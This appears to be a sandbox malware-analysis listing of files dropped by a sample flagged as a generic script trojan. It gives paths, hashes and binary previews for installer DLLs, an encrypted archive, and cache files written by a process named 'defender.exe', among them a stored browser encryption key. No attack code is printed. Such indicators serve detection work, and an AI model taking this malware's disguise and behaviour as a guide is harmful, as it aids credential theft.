                                                                    Entropy (8bit):6.329767466271418
                                                                    Encrypted:false
                                                                    SSDEEP:49152:tG7ixZvPbWjIXTFy1RYQZHJvuZBiDTwgvsrt5/PXd0kpmaN+WUf4CvB25zT7RCAq:c7iDPqjvzO1Lhgf49zT7grg4
                                                                    MD5:A0845E0774702DA9550222AB1B4FDED7
                                                                    SHA1:65D5BD6C64090F0774FD0A4C9B215A868B48E19B
                                                                    SHA-256:6150A413EBE00F92F38737BDCCF493D19921EF6329FCD48E53DE9DBDE4780810
                                                                    SHA-512:4BE0CB1E3C942A1695BAE7B45D21C5F70E407132ECC65EFB5B085A50CDAB3C33C26E90BD7C86198EC40FB2B18D026474B6C649776A3CA2CA5BFF6F922DE2319B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......?..........&8...................................... Q...........`A........................................X.J.~.....J.P.....P.......N..c............P..}....J.....................h.J.(...@.?.8...........x.K.P............................text...".?.......?................. ..`.rdata..$.....?.. ....?.............@..@.data...`.....K.......K.............@....pdata...c....N..d...\M.............@..@.00cfg..(.....P.......N.............@..@.gxfg...`,... P.......N.............@..@.retplne\....PP.......N..................tls....Q....`P.......N.............@....voltbl.8....pP.......N................._RDATA........P.......N.............@..@.rsrc.........P.......N.............@..@.reloc...}....P..~....N.............@..B........................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader_icd.json

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):106
                                                                    Entropy (8bit):4.724752649036734
                                                                    Encrypted:false
                                                                    SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                    MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                    SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                    SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                    SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                    Malicious:false
                                                                    Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):920576
                                                                    Entropy (8bit):6.556557427650666
                                                                    Encrypted:false
                                                                    SSDEEP:24576:PR9nl1crwjLAQw6Z5WUDYsH56g3P0zAk7:PR1l1culw6Z5WUDYsH56g3P0zAk7
                                                                    MD5:0E4E0F481B261EA59F196E5076025F77
                                                                    SHA1:C73C1F33B5B42E9D67D819226DB69E60D2262D7B
                                                                    SHA-256:F681844896C084D2140AC210A974D8DB099138FE75EDB4DF80E233D4B287196A
                                                                    SHA-512:E6127D778EC73ACBEB182D42E5CF36C8DA76448FBDAB49971DE88EC4EB13CE63140A2A83FC3A1B116E41F87508FF546C0D7C042B8F4CDD9E07963801F3156BA2
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." .....l................................................................`A............................................<!..T...P...............pn..............<...Tn......................8m..(...@...8............................................text....k.......l.................. ..`.rdata..4............p..............@..@.data....L...P... ...6..............@....pdata..pn.......p...V..............@..@.00cfg..(...........................@..@.gxfg... (... ...*..................@..@.retplne\....P...........................tls.........`......................@....voltbl.8....p.........................._RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):5.719859767584478
                                                                    Encrypted:false
                                                                    SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                    MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                    SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                    SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                    SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\app-64.7z

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:7-zip archive data, version 0.4
                                                                    Category:dropped
                                                                    Size (bytes):69132162
                                                                    Entropy (8bit):7.999993610504196
                                                                    Encrypted:true
                                                                    SSDEEP:1572864:irziNx5qUJsrnLn3ttl5lWSehqFfIxi+blIowRjnMUlS/tfp:lx5qUJsrL3t5lWTjigwRjnBQ/9p
                                                                    MD5:8B5C4BA64B5771A2FB1C02CE06071D83
                                                                    SHA1:88973593B1602DB7EEBF40C912D97022E7D6DEFC
                                                                    SHA-256:16E71D87B581E3C798224DB66907ECD20A72832E5373D604A3AF9EAA1EFE2AA8
                                                                    SHA-512:E9990E600638414D0F5DF2B3CA668DB5957E56CBF1C3AFAC80DBAB7A9C80D1F186293BB3FFD500000303EEAEDC0707AF9CD34FA2FD65B5461B5188706BD5F0B6
                                                                    Malicious:false
                                                                    Preview:7z..'....6hW=.......%........s.q.....]...6...#k.![y.`.Gr#.f..F.....c}.R|..j=...,._..z..gC5Q.j...7S.:0`..o..^.._e....0.....K....T).XS.CPP'....B...&...<..f........`".U01o...QI.3i.].vD.d9...V...>%.+..5...~M.,.[.....q..1..../.&.h...4;!<..-O......4r......8..a.\I....=...!NNs.QB.."..M?....J..D...bvy....u#.:,..y..5T^.&'% !"....-...u<kJ..;..9..X6....v..b...T.9u..#.v.(l....n.......v...ZE.i...uEcGJ!c+.;...Z.n.:.0...-...!..$...^l-`A%kX<..,.....2...........^....a...L...s.x..RN.w..]@;~ymo:J.....i..M......h..Z.nL...........J}J.. .l...O...[5.>.5........;....o..up..1.N4H9.K..es....l.(.-W=(z.OR.|r .k.......\.?}.ua..L.~..'K).&...iIAoe...u.. ...Z.f../8P.....H._.!........@_.S..m.*F....g....-....i.:&i..h.n..6&..H.}..!.T...e....S.........$.....Sazv...[.W9+.A..}P^.p........uFh..\o...Ft...$.p..-.....:).......g\...&>.^.<..!8N.@mmC....?.Q.(.]t....8.i.........!fh..dd....)...eL.L`.a..Z1hD.$.j..[Fz..I..b.C.|...._\.w$..5.rB.+....B..&!....i..J..8..7..u..x.h...?......!p.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):434176
                                                                    Entropy (8bit):6.584811966667578
                                                                    Encrypted:false
                                                                    SSDEEP:6144:aUWQQ5O3fz0NG3ucDaEUTWfk+ZA0NrCL/k+uyoyBOX1okfW7w+Pfzqibckl:an5QEG39fPAkrE4yrBOXDfaNbck
                                                                    MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                    SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                    SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                    SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.6a..X2..X2..X2m.[3..X2m.]3..X2Z.]3+.X2Z.\3..X2Z.[3..X2m.\3..X2m.Y3..X2..Y2..X2..\3#.X2..]3..X2..X3..X2...2..X2...2..X2..Z3..X2Rich..X2........PE..L.....\...........!......................... ...............................@............@..........................6.......7..d................................E.....................................@............ ...............................text............................... ..`.rdata..8"... ...$..................@..@.data........P... ...6..............@....rsrc................V..............@..@.reloc...E.......F...Z..............@..B........................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-GB\default.acl

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2
                                                                    Entropy (8bit):1.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Qn:Qn
                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                    Malicious:false
                                                                    Preview:..

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-GB\default.dic

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2
                                                                    Entropy (8bit):1.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Qn:Qn
                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                    Malicious:false
                                                                    Preview:..

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-GB\default.exc

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2
                                                                    Entropy (8bit):1.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Qn:Qn
                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                    Malicious:false
                                                                    Preview:..

                                                                    C:\Users\user\AppData\Roaming\defender\13a86942-62b3-4bd1-9ae8-3ee8b7e78dc3.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):389
                                                                    Entropy (8bit):5.593166102929949
                                                                    Encrypted:false
                                                                    SSDEEP:6:YKWCRgXt9RdrtybHV+vk/CzU5A/y+OttzcyEvzgEcYkvkkowNjBJhXqpRi7WGb1:YKWSg99rrt+1A1NyjgJvzg+61hfaGb1
                                                                    MD5:21D9EE56704515FFCCAACEAE73364E3B
                                                                    SHA1:E63363B2C94C3B74CA70BB76071830548FC8D0F9
                                                                    SHA-256:4065D690CD539D2443CE89BEE2E9905A316733420DB215ECFF0CC77B27B255E6
                                                                    SHA-512:6141560E1D79024A693556F08C7A257500D44730FFBD7343A0DCC3D7ACA7F8EBF7FDB0A97E683A2CCD574716432DD2F128AD8D9D040DFDDAA0CB6E4158AD3379
                                                                    Malicious:false
                                                                    Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADb0wvCFkK9QZPr1SyT0UjDAAAAAAIAAAAAABBmAAAAAQAAIAAAADs/u+yww62kY9LDG5e0qdozxvxX8u1wHzcMWcgW6PaAAAAAAA6AAAAAAgAAIAAAACkCyCfxfMtoqTYb3jjAJyUlvyXN9N5PViIJ10isY2JsMAAAAEGE2Z3EFjU2YGf9Z76wyfDCUXZEPN/2/T/C0lkZaqHcddgcxbirR8bBj2gdinbNUUAAAAAuIe0ZvQy5iUh0jO3z9mwNTGuNybnxKLQrYwsZeseFrYvUVHzjzwbuYtWiopxZuKMwTuh0ETqq4tsYrsedyD0U"}}

                                                                    C:\Users\user\AppData\Roaming\defender\9d11a50f-6cd4-41b6-9128-7d8372216057.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):57
                                                                    Entropy (8bit):4.283088322451805
                                                                    Encrypted:false
                                                                    SSDEEP:3:YWVbSZAjMx/ALfnH4JaGqx41n:YWNlDGn
                                                                    MD5:329622F40165883B656ABAB0D93674C4
                                                                    SHA1:DD0DDF3B58BA7BF841B7664F890C65DC7B20CE87
                                                                    SHA-256:2A2BF0F32B2E88B7394AB518C2EF85880824317076DCE7E932BB8C9B8F218488
                                                                    SHA-512:BF9173F47118D3FD466378CA186B74EFB7481AF15AEABD0BDBA43331721D93F5F9E4D1FD94F38873B8DBA9352D2EB4BF8044A21C52A52409615E3E25894393CF
                                                                    Malicious:false
                                                                    Preview:{"spellcheck":{"dictionaries":["en-GB"],"dictionary":""}}

                                                                    C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data\data_0

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.01057775872642915
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsFl:/F
                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                    Malicious:false
                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data\data_1

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270336
                                                                    Entropy (8bit):8.280239615765425E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data\data_2

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.011852361981932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsHlDll:/H
                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data\data_3

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.012340643231932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsGl3ll:/y
                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data\index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):524656
                                                                    Entropy (8bit):5.027445846313988E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:LsulXYu:LsUY
                                                                    MD5:CD50C2E992CA425DA971988F4EB87395
                                                                    SHA1:DE99614207D3E2C0DE4395AE1A9EE2E86865393E
                                                                    SHA-256:DEBA0673B4F8CA786D51234093BB1E436081E5D638FF6C85BFD2E4631AADD2FD
                                                                    SHA-512:285387A2CAED6205C4A2CFFE6A4E432E8925F941AE3079B90ACE7CC7BDC362B3196BC340C710F2BE33CC70CF0AD1136B81272F69B90C7B8E9827E0DB064EBDFC
                                                                    Malicious:false
                                                                    Preview:........................................&...s}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\Code Cache\js\index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):24
                                                                    Entropy (8bit):2.1431558784658327
                                                                    Encrypted:false
                                                                    SSDEEP:3:m+l:m
                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                    Malicious:false
                                                                    Preview:0\r..m..................

                                                                    C:\Users\user\AppData\Roaming\defender\Code Cache\js\index-dir\temp-index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:NjItAyEIbG:oA9qG
                                                                    MD5:B579E3732EFD0DA165FBE9FF0CD0FD1E
                                                                    SHA1:DF17D620419F2C27E2340D924B1699829AC22C0A
                                                                    SHA-256:FD08D6BDF5BBAF819A78A6A35EB7A928CAFEE2E933137D4281B2ED221480FD53
                                                                    SHA-512:4D485F6EF37400395544BF3A607E61EF85BEB004EF6501C0D35BA46F0911B56C0D60F80F209C52D9606ADFBB6A2CC6FE0E9430F1D41FB40A4973E8BF8B2C4E1E
                                                                    Malicious:false
                                                                    Preview:(.......oy retne........................T.2.s}/.

                                                                    C:\Users\user\AppData\Roaming\defender\Code Cache\js\index-dir\the-real-index (copy)

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:NjItAyEIbG:oA9qG
                                                                    MD5:B579E3732EFD0DA165FBE9FF0CD0FD1E
                                                                    SHA1:DF17D620419F2C27E2340D924B1699829AC22C0A
                                                                    SHA-256:FD08D6BDF5BBAF819A78A6A35EB7A928CAFEE2E933137D4281B2ED221480FD53
                                                                    SHA-512:4D485F6EF37400395544BF3A607E61EF85BEB004EF6501C0D35BA46F0911B56C0D60F80F209C52D9606ADFBB6A2CC6FE0E9430F1D41FB40A4973E8BF8B2C4E1E
                                                                    Malicious:false
                                                                    Preview:(.......oy retne........................T.2.s}/.

                                                                    C:\Users\user\AppData\Roaming\defender\Code Cache\wasm\index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):24
                                                                    Entropy (8bit):2.1431558784658327
                                                                    Encrypted:false
                                                                    SSDEEP:3:m+l:m
                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                    Malicious:false
                                                                    Preview:0\r..m..................

                                                                    C:\Users\user\AppData\Roaming\defender\Code Cache\wasm\index-dir\temp-index

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:8lHyyEbaWY+n:8lHqba+
                                                                    MD5:2F04D90A309EC1EEB5C83B2641512B00
                                                                    SHA1:726BD3FB1F4245CBE081C8C4FE3C94C43F289883
                                                                    SHA-256:BC9CBA224F9567E3215AA1E4CA7648F634BFFB22EED6142A0B34FABFE4C8A25D
                                                                    SHA-512:C90EBF70E002A1EC51E8AC33A02ECD5D2D46C88D3ABD80972D045B92635A8576F18810D2311B7189CDCB6EFCB9B3E03F391B263EC20E559A1A379906DA58244B
                                                                    Malicious:false
                                                                    Preview:(...a.".oy retne........................G.2.s}/.

                                                                    C:\Users\user\AppData\Roaming\defender\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:8lHyyEbaWY+n:8lHqba+
                                                                    MD5:2F04D90A309EC1EEB5C83B2641512B00
                                                                    SHA1:726BD3FB1F4245CBE081C8C4FE3C94C43F289883
                                                                    SHA-256:BC9CBA224F9567E3215AA1E4CA7648F634BFFB22EED6142A0B34FABFE4C8A25D
                                                                    SHA-512:C90EBF70E002A1EC51E8AC33A02ECD5D2D46C88D3ABD80972D045B92635A8576F18810D2311B7189CDCB6EFCB9B3E03F391B263EC20E559A1A379906DA58244B
                                                                    Malicious:false
                                                                    Preview:(...a.".oy retne........................G.2.s}/.

                                                                    C:\Users\user\AppData\Roaming\defender\DawnCache\data_0

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.01057775872642915
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsFl:/F
                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                    Malicious:false
                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\DawnCache\data_1

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270336
                                                                    Entropy (8bit):8.280239615765425E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\DawnCache\data_2

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.011852361981932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsHlDll:/H
                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\defender\DawnCache\data_3

                                                                    Download File
